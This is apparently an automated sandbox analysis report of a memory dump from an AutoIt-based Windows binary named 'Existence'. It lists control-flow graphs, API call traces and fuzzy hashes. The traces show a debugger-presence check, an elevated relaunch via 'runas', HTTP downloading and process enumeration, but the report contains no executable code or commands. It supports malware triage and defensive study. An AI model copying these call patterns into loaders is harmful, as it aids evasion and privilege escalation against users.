                                                                                                                                                                                          control_flow_graph 261 735fc8-736037 call 73bf73 GetVersionExW call 738577 266 77507d-775090 261->266 267 73603d 261->267 269 775091-775095 266->269 268 73603f-736041 267->268 270 736047-7360a6 call 73adf4 call 7355dc 268->270 271 7750bc 268->271 272 775097 269->272 273 775098-7750a4 269->273 285 775224-77522b 270->285 286 7360ac-7360ae 270->286 276 7750c3-7750cf 271->276 272->273 273->269 275 7750a6-7750a8 273->275 275->268 278 7750ae-7750b5 275->278 279 73611c-736136 GetCurrentProcess IsWow64Process 276->279 278->266 281 7750b7 278->281 283 736195-73619b 279->283 284 736138 279->284 281->271 287 73613e-73614a 283->287 284->287 290 77522d 285->290 291 77524b-77524e 285->291 288 775125-775138 286->288 289 7360b4-7360b7 286->289 292 736150-73615f LoadLibraryA 287->292 293 775269-77526d GetSystemInfo 287->293 297 775161-775163 288->297 298 77513a-775143 288->298 289->279 299 7360b9-7360f5 289->299 296 775233 290->296 300 775250-77525f 291->300 301 775239-775241 291->301 294 736161-73616f GetProcAddress 292->294 295 73619d-7361a7 GetSystemInfo 292->295 294->295 302 736171-736175 GetNativeSystemInfo 294->302 303 736177-736179 295->303 296->301 307 775165-77517a 297->307 308 775198-77519b 297->308 304 775145-77514b 298->304 305 775150-77515c 298->305 299->279 306 7360f7-7360fa 299->306 300->296 309 775261-775267 300->309 301->291 302->303 312 736182-736194 303->312 313 73617b-73617c FreeLibrary 303->313 304->279 305->279 314 7750d4-7750e4 306->314 315 736100-73610a 306->315 316 775187-775193 307->316 317 77517c-775182 307->317 310 7751d6-7751d9 308->310 311 77519d-7751b8 308->311 309->301 310->279 322 7751df-775206 310->322 318 7751c5-7751d1 311->318 319 7751ba-7751c0 311->319 313->312 320 7750f7-775101 314->320 321 7750e6-7750f2 314->321 315->276 323 736110-736116 315->323 316->279 
317->279 318->279 319->279 324 775114-775120 320->324 325 775103-77510f 320->325 321->279 326 775213-77521f 322->326 327 775208-77520e 322->327 323->279 324->279 325->279 326->279 327->279
APIs
• GetVersionExW.KERNEL32(?), ref: 00735FF7
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
• GetCurrentProcess.KERNEL32(?,007CDC2C,00000000,?,?), ref: 00736123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 0073612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00736155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00736167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00736175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0073617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 007361A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: e1509680d4240b74e1cbd47946a471d7958a14d7187ae3e87a692669a73982bc
• Instruction ID: a804d6e95f804ae339018cc7ed466204be79d6d60972a2d00a5ade80992f38ab
• Opcode Fuzzy Hash: e1509680d4240b74e1cbd47946a471d7958a14d7187ae3e87a692669a73982bc
• Instruction Fuzzy Hash: C0A1C46180A2C8DFDB96CB787C4D5A67F957B26340F2A889DD48493333D2ED4948CB35
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00733368,?), ref: 007333BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00733368,?), ref: 007333CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00802418,00802400,?,?,?,?,?,?,00733368,?), ref: 0073343A
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
  • Part of subcall function 0073425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00733462,00802418,?,?,?,?,?,?,?,00733368,?), ref: 007342A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00802418,?,?,?,?,?,?,?,00733368,?), ref: 007334BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00773CB0
• SetCurrentDirectoryW.KERNEL32(?,00802418,?,?,?,?,?,?,?,00733368,?), ref: 00773CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007F31F4,00802418,?,?,?,?,?,?,?,00733368), ref: 00773D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00773D81
  • Part of subcall function 007334D3: GetSysColorBrush.USER32(0000000F), ref: 007334DE
  • Part of subcall function 007334D3: LoadCursorW.USER32(00000000,00007F00), ref: 007334ED
  • Part of subcall function 007334D3: LoadIconW.USER32(00000063), ref: 00733503
  • Part of subcall function 007334D3: LoadIconW.USER32(000000A4), ref: 00733515
  • Part of subcall function 007334D3: LoadIconW.USER32(000000A2), ref: 00733527
  • Part of subcall function 007334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0073353F
  • Part of subcall function 007334D3: RegisterClassExW.USER32(?), ref: 00733590
  • Part of subcall function 007335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007335E1
  • Part of subcall function 007335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733602
  • Part of subcall function 007335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 00733616
  • Part of subcall function 007335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 0073361F
  • Part of subcall function 0073396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00733A3C
Strings
• runas, xrefs: 00773D75
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00773CAA
• AutoIt, xrefs: 00773CA5
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 683915450-2030392706
• Opcode ID: bc32dd8e482f6762a8888e5db2c689d77ad2b5e6c361f34aedbb50662e0fac0f
• Instruction ID: 5c1d3a794c3616304db43907940bf25e19f499f97bc6aa8aaa221e83296810ba
• Opcode Fuzzy Hash: bc32dd8e482f6762a8888e5db2c689d77ad2b5e6c361f34aedbb50662e0fac0f
• Instruction Fuzzy Hash: 9151F771208385EAEB25EF609C49D7A7BA8FF84740F00442CF595922A3DB7C9A49D726
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
  • Part of subcall function 0079EAB0: GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 0079DCCB
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0079DD1B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0079DD2C
• FindClose.KERNEL32(00000000), ref: 0079DD43
• FindClose.KERNEL32(00000000), ref: 0079DD4C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: ac394da9ba1b637a7b0d07641a4eb4e7b43b2f05c65b39fbb02d1ea2dc0f2d4d
• Instruction ID: 95aee94732a36105974bd4fc3f08770968aa41f60c1748c96caedf874c515373
• Opcode Fuzzy Hash: ac394da9ba1b637a7b0d07641a4eb4e7b43b2f05c65b39fbb02d1ea2dc0f2d4d
• Instruction Fuzzy Hash: 77318E31008385EFD710EB64D8998AFB7E8BE96300F404D6DF5D582192EB28DE09CB67
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                          control_flow_graph 944 7ad95f-7ad988 InternetQueryDataAvailable 945 7ad98a-7ad98f 944->945 946 7ad992-7ad995 944->946 945->946 947 7ad9ea-7ad9f0 946->947 948 7ad997-7ad999 946->948 949 7ada29-7ada34 947->949 950 7ad9f2 947->950 951 7ad99b-7ad99d 948->951 952 7ad99f-7ad9aa call 75017b 948->952 956 7ada3d 949->956 957 7ada36-7ada37 SetEvent 949->957 953 7ad9f9-7ada0a GetLastError 950->953 954 7ad9ab-7ad9bc InternetReadFile 951->954 952->954 958 7ada0c-7ada0d SetEvent 953->958 959 7ada13-7ada15 953->959 961 7ad9be-7ad9c1 954->961 962 7ada17-7ada27 call 75013d 954->962 963 7ada3f-7ada43 956->963 957->956 958->959 959->963 965 7ad9c3-7ad9da call 7adcc3 961->965 966 7ad9e1-7ad9e9 call 75013d 961->966 962->953 965->947 972 7ad9dc-7ad9df 965->972 966->947 972->948
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 007AD97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 007AD9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,007ACC63,00000000), ref: 007AD9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,007ACC63,00000000), ref: 007ADA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,007ACC63,00000000), ref: 007ADA37
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: c2afbc8f2648169384705760765126a5a4e6df5db1e64c077dab312f95376cda
• Instruction ID: 91e5ff47c6cdc246c6fc5c936e66a1c352071f30ebaf66de1e875f825fdbfd51
• Opcode Fuzzy Hash: c2afbc8f2648169384705760765126a5a4e6df5db1e64c077dab312f95376cda
• Instruction Fuzzy Hash: 10316971504608EFDB30DFA5D888EAFBBF8EB85350B10852EF546D2550DB78EE419B60
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0079DDAC
• Process32FirstW.KERNEL32(00000000,?), ref: 0079DDBA
• Process32NextW.KERNEL32(00000000,?), ref: 0079DDDA
• FindCloseChangeNotification.KERNEL32(00000000), ref: 0079DE87
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
• String ID:
• API String ID: 3243318325-0
• Opcode ID: 5af6890bb66df4d07cd8e8109b6cd09b3708499338c16d6e290c314ecb97f020
• Instruction ID: 898fbb06dd96438fa2438f4bb2900042311697a325f14761f8925aa5a05866b4
• Opcode Fuzzy Hash: 5af6890bb66df4d07cd8e8109b6cd09b3708499338c16d6e290c314ecb97f020
• Instruction Fuzzy Hash: 51317171108301DFD721EF60D889AAFBBE8AF99350F44092DF681871A2DB759D45CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,007746AC), ref: 0079E482
• GetFileAttributesW.KERNEL32(?), ref: 0079E491
• FindFirstFileW.KERNEL32(?,?), ref: 0079E4A2
• FindClose.KERNEL32(00000000), ref: 0079E4AE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: fd90b5a8c6b5f4f557bc75c2fc347687138934d77a8f7f70d4cc48d50e98cb74
• Instruction ID: 8c4d57b45480445f046f51710547fd7002a9b74ded41ae826464e5f5d646ef34
• Opcode Fuzzy Hash: fd90b5a8c6b5f4f557bc75c2fc347687138934d77a8f7f70d4cc48d50e98cb74
• Instruction Fuzzy Hash: 6FF0A030410910679620A7B8BC0D8AE776DBE02335B548719F8B6C20F0DB7CAD958699
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002,00000000), ref: 00755079
• TerminateProcess.KERNEL32(00000000,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002,00000000), ref: 00755080
• ExitProcess.KERNEL32 ref: 00755092
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 8efe058e81d04b4452bcb7976794003ae263ab57fa84e8870c32b39054a82eab
• Instruction ID: 3a5d2d643381c2b34cdd360823a955342043bc5f5700fc2031917a4bc949d6ff
• Opcode Fuzzy Hash: 8efe058e81d04b4452bcb7976794003ae263ab57fa84e8870c32b39054a82eab
• Instruction Fuzzy Hash: D7E0B631000A48EFDF216F64DD1DE983B6AEB54386F158028FC499A561DB7DED46CAC4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Rendered graph: entry block 0 at 74ac3e-74b063 (calls 738ec0, 74bc58, 73e6a0); basic blocks numbered 0-223 spanning 74ac3e-74b20b and 788584-788b21; further internal call targets in the graph: 74b5b6, 73c98d, 754d98, 74bbbe, 754cd3, 737ad5, 737b1a, 73bd98, 736c03, 73ad40, 73b4b1, 738577, 759334, 73396b, 733907.
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID: 4|$@|$P|$`|$d0b$d10m0$d1b$d1r0,2$d5m0$i$t|$t|$|$|
• API String ID: 0-634568145
• Opcode ID: 97138074352d123a977791e0ea8b3db878d8d23e1b274f5ab9a665c645e5c3fa
• Instruction ID: 45d8caf667df1b69ca45c83ed3062b51685f5fc6a890f785b792141f214121e3
• Opcode Fuzzy Hash: 97138074352d123a977791e0ea8b3db878d8d23e1b274f5ab9a665c645e5c3fa
• Instruction Fuzzy Hash: 2F624970508345CFC764DF24C099AAABBE1FF88304F54896EE4998B352DB79E945CF82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 224 7acebb-7aced3 225 7acedd-7aceff InternetConnectW 224->225 226 7aced5-7aceda 224->226 227 7acf29-7acf3f HttpOpenRequestW 225->227 228 7acf01-7acf19 GetLastError 225->228 226->225 231 7acf4d-7acf50 227->231 232 7acf41-7acf48 227->232 229 7acf1b-7acf1c SetEvent 228->229 230 7acf22-7acf24 228->230 229->230 233 7ad048-7ad04c 230->233 235 7acf5d-7acf64 231->235 236 7acf52-7acf58 call 7ada46 231->236 234 7ad021-7ad032 GetLastError 232->234 237 7ad03b-7ad03d 234->237 238 7ad034-7ad035 SetEvent 234->238 240 7acf66-7acf8e InternetQueryOptionW InternetSetOptionW 235->240 241 7acf94-7acfa1 HttpSendRequestW 235->241 236->235 242 7ad03f-7ad040 InternetCloseHandle 237->242 243 7ad046 237->243 238->237 240->241 244 7ad01a 241->244 245 7acfa3-7acfae call 7ace7c 241->245 242->243 243->233 244->234 245->244 248 7acfb0-7acfe8 HttpQueryInfoW call 75666b 245->248 251 7acfea-7acff0 248->251 252 7ad002-7ad00d 248->252 253 7acff9 call 7ad889 251->253 254 7acff2 call 7ad95f 251->254 255 7ad00f-7ad010 SetEvent 252->255 256 7ad016-7ad018 252->256 260 7acffe-7ad000 253->260 259 7acff7 254->259 255->256 256->237 259->260 260->237
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACEF5
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007ACF08
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007ACF1C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007ACF35
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 007ACF78
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007ACF8E
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007ACF99
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007ACFC9
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007AD021
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007AD035
• InternetCloseHandle.WININET(00000000), ref: 007AD040
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: 5e8766afd4fe0b9f4596872e07fad1c4799dd07e9e802580694f5c7bedce9419
• Instruction ID: b175539e919336e0c62baeaa3097bc0393e9fc3fb762e3b2064f79d535f3e6e9
• Opcode Fuzzy Hash: 5e8766afd4fe0b9f4596872e07fad1c4799dd07e9e802580694f5c7bedce9419
• Instruction Fuzzy Hash: FE514DB1500604BFDB329F60C988EAB7BBCFF8A744F00852DF94696550D778DD459B60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00733657
• RegisterClassExW.USER32(00000030), ref: 00733681
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733692
• InitCommonControlsEx.COMCTL32(?), ref: 007336AF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007336BF
• LoadIconW.USER32(000000A9), ref: 007336D5
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007336E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$0+m"s$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-3265637659
• Opcode ID: ac6169830662bd7c0f0c5941472c29304645d71393e4e6068adca701c93d7574
• Instruction ID: 8d7dfe895b4f2ca3421d072a40c13b29ea3a5de3d84a79c2008d12a265905c62
• Opcode Fuzzy Hash: ac6169830662bd7c0f0c5941472c29304645d71393e4e6068adca701c93d7574
• Instruction Fuzzy Hash: DC21C3B1D01218AFDB50DFA8EC89F9DBBB4FB08710F00812AF515A62A0D7B949448F94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 393 7709db-770a0b call 7707af 396 770a26-770a32 call 765594 393->396 397 770a0d-770a18 call 75f636 393->397 403 770a34-770a49 call 75f636 call 75f649 396->403 404 770a4b-770a94 call 77071a 396->404 402 770a1a-770a21 call 75f649 397->402 414 770cfd-770d03 402->414 403->402 412 770a96-770a9f 404->412 413 770b01-770b0a GetFileType 404->413 416 770ad6-770afc GetLastError call 75f613 412->416 417 770aa1-770aa5 412->417 418 770b53-770b56 413->418 419 770b0c-770b3d GetLastError call 75f613 CloseHandle 413->419 416->402 417->416 422 770aa7-770ad4 call 77071a 417->422 420 770b5f-770b65 418->420 421 770b58-770b5d 418->421 419->402 430 770b43-770b4e call 75f649 419->430 426 770b69-770bb7 call 7654dd 420->426 427 770b67 420->427 421->426 422->413 422->416 436 770bc7-770beb call 7704cd 426->436 437 770bb9-770bc5 call 77092b 426->437 427->426 430->402 442 770bfe-770c41 436->442 443 770bed 436->443 437->436 444 770bef-770bf9 call 768a2e 437->444 446 770c43-770c47 442->446 447 770c62-770c70 442->447 443->444 444->414 446->447 449 770c49-770c5d 446->449 450 770c76-770c7a 447->450 451 770cfb 447->451 449->447 450->451 452 770c7c-770caf CloseHandle call 77071a 450->452 451->414 455 770ce3-770cf7 452->455 456 770cb1-770cdd GetLastError call 75f613 call 7656a6 452->456 455->451 456->455
APIs
  • Part of subcall function 0077071A: CreateFileW.KERNEL32(00000000,00000000,?,00770A84,?,?,00000000,?,00770A84,00000000,0000000C), ref: 00770737
• GetLastError.KERNEL32 ref: 00770AEF
• __dosmaperr.LIBCMT ref: 00770AF6
• GetFileType.KERNEL32(00000000), ref: 00770B02
• GetLastError.KERNEL32 ref: 00770B0C
• __dosmaperr.LIBCMT ref: 00770B15
• CloseHandle.KERNEL32(00000000), ref: 00770B35
• CloseHandle.KERNEL32(?), ref: 00770C7F
• GetLastError.KERNEL32 ref: 00770CB1
• __dosmaperr.LIBCMT ref: 00770CB8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 4b1a0cdccb7b2cdfa50c6716c73fe89ed750b87663f57aae682b2f70485d378f
• Instruction ID: 47c6007881b66fa8e77db9aaeb0d9207a3db47125aadb11f8c1f784ed0fc065a
• Opcode Fuzzy Hash: 4b1a0cdccb7b2cdfa50c6716c73fe89ed750b87663f57aae682b2f70485d378f
• Instruction Fuzzy Hash: 9FA13532A00149CFCF19AF78DC56BAE3BA0EB06324F148159F815DB2E1DB399D12CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00735594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 007355B2
  • Part of subcall function 00735238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0073525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007353C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00774BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00774C3E
• RegCloseKey.ADVAPI32(?), ref: 00774C80
• _wcslen.LIBCMT ref: 00774CE7
• _wcslen.LIBCMT ref: 00774CF6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
